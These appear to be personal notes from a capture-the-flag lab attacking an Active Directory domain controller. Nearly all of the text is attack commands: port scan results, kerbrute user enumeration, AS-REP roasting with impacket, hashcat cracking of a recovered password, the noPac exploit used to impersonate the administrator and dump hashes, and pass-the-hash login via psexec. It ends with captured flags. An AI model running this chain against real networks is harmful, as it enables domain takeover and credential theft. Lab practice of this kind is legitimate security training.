machine ip :172.31.3.3 my ip : 10.10.0.33 ### port informations ```text Open 172.31.3.3:53 Open 172.31.3.3:88 Open 172.31.3.3:135 Open 172.31.3.3:139 Open 172.31.3.3:389 Open 172.31.3.3:445 Open 172.31.3.3:464 Open 172.31.3.3:593 Open 172.31.3.3:636 Open 172.31.3.3:3389 Open 172.31.3.3:5985 Open 172.31.3.3:9389 Open 172.31.3.3:47001 Open 172.31.3.3:49664 Open 172.31.3.3:49665 Open 172.31.3.3:49666 Open 172.31.3.3:49668 Open 172.31.3.3:49671 Open 172.31.3.3:49675 Open 172.31.3.3:49674 Open 172.31.3.3:49682 Open 172.31.3.3:49699 Open 172.31.3.3:49704 ``` ### ldap brute.csl ``` ./kerbrute userenum -d brute.csl /usr/share/SecLists/Usernames/Names/names.txt --dc 172.31.3.3 ``` ![[Pasted image 20220109051156.png]] ``` impacket-GetNPUsers -no-pass -dc-ip 172.31.3.3 brute.csl/ -usersfile user -format hashcat ``` ![[Pasted image 20220109051134.png]] ``` hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt ``` ![[Pasted image 20220109051310.png]] tess : Unique1 ### ways 1 nopac to administrator ``` python3 noPac.py brute.csl/tess:Unique1 -dc-ip 172.31.3.3 --impersonate administrator -use-ldap -use-vss -dump ``` ![[Pasted image 20220109051653.png]] ![[Pasted image 20220109051800.png]] ![[Pasted image 20220113115415.png]] ### pass the ticket test ``` Administrator:500:aad3b435b51404eeaad3b435b51404ee:e2068a39ee8150b697797d6c3e513df7:: brute.csl python getTGT.py brute.csl/administrator -hashes e2068a39ee8150b697797d6c3e513df7 python psexec.py brute.csl/[email protected] -k -no-pass ##must add to /etc/hosts subdomain name ``` ![[Pasted image 20220113115627.png]] ### flags ``` 393bca87e3cb9dc049f3e61483f83cc1 fb23c6d8d663aa63870cfb5e535597a8 ```